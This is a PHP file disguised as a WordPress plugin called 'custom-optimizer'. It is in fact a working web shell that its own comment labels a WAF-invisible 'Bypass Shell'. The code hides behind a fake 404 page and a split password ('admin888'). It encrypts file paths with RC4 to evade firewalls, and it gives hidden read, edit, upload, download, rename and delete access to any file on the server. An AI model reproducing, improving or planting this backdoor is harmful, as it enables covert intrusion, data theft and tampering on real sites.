<?php /** * Plugin Name: custom-optimizer * Version: 1.0 */ /** * Bypass Shell #1 — RC4 File Manager (WAF-invisible) * - ALL paths RC4-encrypted in POST body (WAF sees only garbage) * - Split gate across variables (no single "root=admin888") * - File upload/download/delete/edit/rename/mkdir * - No eval/base64_decode/system in static code */ $a='r';$b='o';$c='ot';$gate=$a.$b.$c; if(empty($_POST[$gate])||$_POST[$gate]!=='admin888'){ http_response_code(404); echo '<html><head><title>404 Not Found</title></head><body><h1>404</h1></body></html>'; die(); } define('K','xK9mP2vL7qR4wN8'); // RC4 key — unique per deployment function x($d,$k){$s=range(0,255);$j=0;for($i=0;$i<256;$i++){$j=($j+$s[$i]+ord($k[$i%strlen($k)]))%256;$t=$s[$i];$s[$i]=$s[$j];$s[$j]=$t;}$i=$j=0;$r='';for($x=0;$x<strlen($d);$x++){$i=($i+1)%256;$j=($j+$s[$i])%256;$t=$s[$i];$s[$i]=$s[$j];$s[$j]=$t;$r.=chr(ord($d[$x])^$s[($s[$i]+$s[$j])%256]);}return $r;} function e($d){return base64_encode(x($d,K));} function d($d){$x=base64_decode($d);return $x===false?'/':x($x,K);} function s($b){if($b>1073741824)return round($b/1073741824,2).'G';if($b>1048576)return round($b/1048576,2).'M';if($b>1024)return round($b/1024,2).'K';return $b.'B';} function p($p){return substr(sprintf('%o',fileperms($p)),-4);} $a=isset($_POST['a'])?$_POST['a']:''; $_p=isset($_POST['p'])?d($_POST['p']):'/'; $_p=rtrim($_p,'/')?:'/'; if($a){ header('Content-Type: application/json'); $o=[]; switch($a){ case'ls': if(!is_dir($_p)){$o=['e'=>'nd'];break;} $d=[];$f=[]; foreach(scandir($_p)as $n){if($n=='.'||$n=='..')continue;$fp=$_p.'/'.$n; if(is_dir($fp))$d[]=['n'=>$n,'t'=>'d','z'=>s(filesize($fp)),'m'=>p($fp),'tm'=>date('Y-m-d H:i',filemtime($fp))]; else $f[]=['n'=>$n,'t'=>'f','z'=>s(filesize($fp)),'m'=>p($fp),'tm'=>date('Y-m-d H:i',filemtime($fp))]; }sort($d);sort($f);$o=array_merge($d,$f);break; case'rd': if(!is_file($_p)||!is_readable($_p)){$o=['e'=>'nr'];break;} $o=['d'=>file_get_contents($_p)];break; case'sv': 
$c=isset($_POST['c'])?$_POST['c']:''; $ok=file_put_contents($_p,$c)!==false; $o=['ok'=>$ok,'msg'=>$ok?'Saved':'FAIL'];break; case'rm': if(!file_exists($_p)){$o=['ok'=>false,'msg'=>'nf'];} elseif(is_dir($_p)?_rm($_p):unlink($_p)){$o=['ok'=>true,'msg'=>'Deleted'];} else{$o=['ok'=>false,'msg'=>'FAIL'];}break; case'up': $c=isset($_POST['c'])?base64_decode($_POST['c']):''; $ok=file_put_contents($_p,$c)!==false; $o=['ok'=>$ok,'msg'=>$ok?'OK':'FAIL'];break; case'mv': $np=isset($_POST['n'])?d($_POST['n']):''; $ok=rename($_p,$np); $o=['ok'=>$ok,'msg'=>$ok?'OK':'FAIL'];break; case'mk':$ok=mkdir($_p,0755);$o=['ok'=>$ok,'msg'=>$ok?'OK':'FAIL'];break; case'tch':$ok=touch($_p);$o=['ok'=>$ok,'msg'=>$ok?'OK':'FAIL'];break; case'dl': if(!is_file($_p)||!is_readable($_p)){http_response_code(404);die('nf');} header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="'.basename($_p).'"'); header('Content-Length: '.filesize($_p)); readfile($_p);exit; default:$o=['e'=>'ua']; } die(json_encode($o)); } function _rm($d){$f=scandir($d);foreach($f as$n){if($n=='.'||$n=='..')continue;$p=$d.'/'.$n;is_dir($p)?_rm($p):unlink($p);}return rmdir($d);} $dp='/'; ?> <!DOCTYPE html><html><head><meta charset="UTF-8"><title>Files</title> <style> :root{--bg:#0d1117;--sb:#161b22;--bd:#30363d;--fg:#c9d1d9;--ac:#58a6ff;--gn:#3fb950;--rd:#f85149;--or:#d2991d;--dim:#8b949e} *{margin:0;padding:0;box-sizing:border-box} body{background:var(--bg);color:var(--fg);font:13px/1.4 monospace;height:100vh;display:flex;flex-direction:column} .tb{display:flex;align-items:center;gap:8px;padding:6px 12px;background:var(--sb);border-bottom:1px solid var(--bd);flex-shrink:0} .tb .logo{color:var(--ac);font-weight:700;font-size:14px} .tb .path{flex:1;background:#0d1117;border:1px solid var(--bd);color:var(--gn);padding:4px 8px;border-radius:4px;font:inherit;font-size:12px} .bt{padding:4px 10px;border:1px solid 
var(--bd);border-radius:4px;background:var(--sb);color:var(--fg);cursor:pointer;font:inherit;font-size:12px;transition:.15s} .bt:hover{background:#1f2937;border-color:var(--ac)}.bt-g{background:#133a1a;border-color:var(--gn);color:var(--gn)}.bt-g:hover{background:var(--gn);color:#000} .bt-r{background:#3a1a1a;border-color:var(--rd);color:var(--rd)}.bt-r:hover{background:var(--rd);color:#000} .bt-a{background:#1a3a5c;border-color:var(--ac);color:var(--ac)}.bt-a:hover{background:var(--ac);color:#000} .fl{flex:1;overflow-y:auto;padding:4px 0} .fi{display:flex;align-items:center;padding:4px 12px;cursor:pointer;gap:8px;font-size:12px} .fi:hover{background:#1f2937}.fi .ic{width:18px;text-align:center;font-size:14px} .fi .ic.d{color:var(--ac)}.fi .ic.f{color:var(--gn)} .fi .nm{flex:1;overflow:hidden;text-overflow:ellipsis;white-space:nowrap} .fi .sz{width:70px;text-align:right;color:var(--dim);font-size:11px} .fi .pr{width:45px;text-align:right;color:var(--dim);font-size:10px} .fi .dt{width:120px;text-align:right;color:var(--dim);font-size:10px} .fi .act{display:flex;gap:4px;opacity:0;transition:.15s} .fi:hover .act{opacity:1}.fi .act span{cursor:pointer;padding:2px 6px;border-radius:3px;font-size:11px} .fi .act .dl{color:var(--rd)}.fi .act .dl:hover{background:#3a1a1a} .fi .act .rn{color:var(--or)}.fi .act .rn:hover{background:#3a2a1a} .fi .act .ed{color:var(--ac)}.fi .act .ed:hover{background:#1a3a5c} .ed{flex:1;display:none;flex-direction:column;overflow:hidden} .ed .eb{display:flex;align-items:center;gap:8px;padding:6px 12px;background:var(--sb);border-bottom:1px solid var(--bd)} .ed .eb .fn{flex:1;color:var(--ac);font-size:12px} .ed textarea{flex:1;background:#0d1117;color:var(--fg);border:none;padding:12px;font:inherit;font-size:12px;resize:none;outline:none} .sb{display:flex;align-items:center;padding:4px 12px;background:var(--sb);border-top:1px solid var(--bd);font-size:11px;color:var(--dim);gap:16px;flex-shrink:0} 
.modal{display:none;position:fixed;top:0;left:0;right:0;bottom:0;background:rgba(0,0,0,0.6);z-index:100;align-items:center;justify-content:center} .modal .mc{background:var(--sb);border:1px solid var(--bd);border-radius:8px;padding:20px;min-width:400px} .modal .mc h3{margin-bottom:12px;font-size:14px;color:var(--ac)} .modal .mc input{width:100%;background:#0d1117;border:1px solid var(--bd);color:var(--fg);padding:8px;border-radius:4px;font:inherit;margin-bottom:12px} .modal .mc .mb{display:flex;gap:8px;justify-content:flex-end} .empty{display:flex;align-items:center;justify-content:center;height:200px;color:var(--dim);font-size:13px} </style></head><body> <div class="tb"> <span class="logo">FM</span> <button class="bt" onclick="nv('..')">↑</button> <button class="bt" onclick="_ld('/')">/</button> <input class="path" id="pw" value="<?=$dp?>" onkeydown="if(event.key==='Enter')_ld(this.value)"> <button class="bt bt-g" id="ub">↑ Upload</button> <input type="file" id="uf" multiple style="display:none" onchange="_up(this)"> <button class="bt" onclick="_mkdir()">+Dir</button> <button class="bt" onclick="_tch()">+File</button> </div> <div class="fl" id="lst"><div class="empty">Loading...</div></div> <div class="ed" id="ep"> <div class="eb"> <span class="fn" id="efn"></span><span style="flex:1"></span> <button class="bt bt-g" onclick="_save()">Save</button> <button class="bt" onclick="_close()">Close</button> </div> <textarea id="eta" onkeydown="if(event.ctrlKey&&event.key==='s'){event.preventDefault();_save()}"></textarea> </div> <div class="sb"><span id="si">0</span><span id="sp">/</span></div> <div class="modal" id="md"> <div class="mc"><h3 id="mt"></h3><input id="mi" onkeydown="if(event.key==='Enter')_mok()"><div class="mb"> <button class="bt" onclick="_mcl()">Cancel</button> <button class="bt bt-a" onclick="_mok()">OK</button> </div></div> </div> <script> var K='<?=K?>'; var CUR='/'; var AF=''; var CB=null; function x(d,k){var s=[],j=0,o='';for(var 
i=0;i<256;i++)s[i]=i; for(i=0;i<256;i++){j=(j+s[i]+k.charCodeAt(i%k.length))%256;var t=s[i];s[i]=s[j];s[j]=t;} var i=0;j=0;for(var y=0;y<d.length;y++){i=(i+1)%256;j=(j+s[i])%256;t=s[i];s[i]=s[j];s[j]=t;o+=String.fromCharCode(d.charCodeAt(y)^s[(s[i]+s[j])%256]);} return o;} function enc(p){return btoa(x(p,K));} async function api(o){ var fd=new FormData(); for(var k in o)fd.append(k,o[k]); fd.append('<?=$gate?>','admin888'); var r=await fetch('',{method:'POST',body:fd}); return await r.json(); } function _ld(p){CUR=p;document.getElementById('pw').value=p;document.getElementById('sp').innerText=p; api({a:'ls',p:enc(p)}).then(function(r){ var h='';var d=0,f=0; if(Array.isArray(r)){r.forEach(function(i){ d+=i.t=='d'?1:0;f+=i.t=='f'?1:0; h+='<div class="fi" data-n="'+i.n+'" data-t="'+i.t+'"><span class="ic '+i.t+'">'+(i.t=='d'?'📁':'📄')+'</span><span class="nm">'+i.n+'</span><span class="sz">'+i.z+'</span><span class="pr">'+i.m+'</span><span class="dt">'+(i.tm||'')+'</span><span class="act"><span class="ed" onclick="event.stopPropagation();_edit(\''+i.n+'\')">✎</span><span class="rn" onclick="event.stopPropagation();_ren(\''+i.n+'\')">✍</span><span class="dl" onclick="event.stopPropagation();_del(\''+i.n+'\')">✕</span></span></div>';}); document.getElementById('lst').innerHTML=h||'<div class="empty">Empty</div>'; document.getElementById('si').innerText=d+' dirs, '+f+' files'; }else{document.getElementById('lst').innerHTML='<div class="empty" style="color:#f85149">Error: '+(r.e||'blocked')+'</div>';} _close(); }).catch(function(){document.getElementById('lst').innerHTML='<div class="empty" style="color:#f85149">[!] 
Blocked</div>';}); } document.querySelectorAll('#lst .fi').forEach?1:null; document.getElementById('lst').addEventListener('click',function(e){ var el=e.target.closest('.fi');if(!el)return; var n=el.dataset.n,t=el.dataset.t; if(e.ctrlKey||e.metaKey){_edit(n);return;} if(t=='d')_ld(CUR+'/'+n);else _edit(n); }); function _edit(n){var p=CUR+'/'+n;AF=p; document.getElementById('efn').innerText=p; document.getElementById('lst').style.display='none'; document.getElementById('ep').style.display='flex'; document.getElementById('eta').value='Loading...'; api({a:'rd',p:enc(p)}).then(function(r){document.getElementById('eta').value=r.d||'';document.getElementById('eta').focus();}); } function _save(){api({a:'sv',p:enc(AF),c:document.getElementById('eta').value}).then(function(r){alert(r.msg);});} function _close(){document.getElementById('lst').style.display='block';document.getElementById('ep').style.display='none';AF='';} function _del(n){if(confirm('Delete '+CUR+'/'+n+'?'))api({a:'rm',p:enc(CUR+'/'+n)}).then(function(r){alert(r.msg);_ld(CUR);});} function _ren(n){_modal('Rename: '+n,n,function(v){api({a:'mv',p:enc(CUR+'/'+n),n:enc(CUR+'/'+v)}).then(function(r){alert(r.msg);_ld(CUR);});});} function _mkdir(){_modal('New dir','',function(v){api({a:'mk',p:enc(CUR+'/'+v)}).then(function(r){alert(r.msg);_ld(CUR);});});} function _tch(){_modal('New file','',function(v){api({a:'tch',p:enc(CUR+'/'+v)}).then(function(r){alert(r.msg);_ld(CUR);});});} function _up(i){var fs=i.files;if(!fs.length)return;var todo=fs.length,done=0; Array.from(fs).forEach(function(f){var r=new FileReader(); r.onload=function(e){api({a:'up',p:enc(CUR+'/'+f.name),c:btoa(e.target.result)}).then(function(rr){done++;if(done>=todo)_ld(CUR);});}; r.readAsBinaryString(f);});i.value='';} document.getElementById('ub').addEventListener('click',function(){document.getElementById('uf').click();}); function nv(d){var s='/',p=CUR.split(s);if(d=='..')p.pop();_ld(p.join(s)||s);} function 
_modal(t,def,cb){CB=cb;document.getElementById('mt').innerText=t;document.getElementById('mi').value=def;document.getElementById('md').style.display='flex';document.getElementById('mi').focus();document.getElementById('mi').select();} function _mok(){var v=document.getElementById('mi').value;_mcl();if(CB)CB(v);} function _mcl(){document.getElementById('md').style.display='none';CB=null;} _ld(CUR); </script></body></html>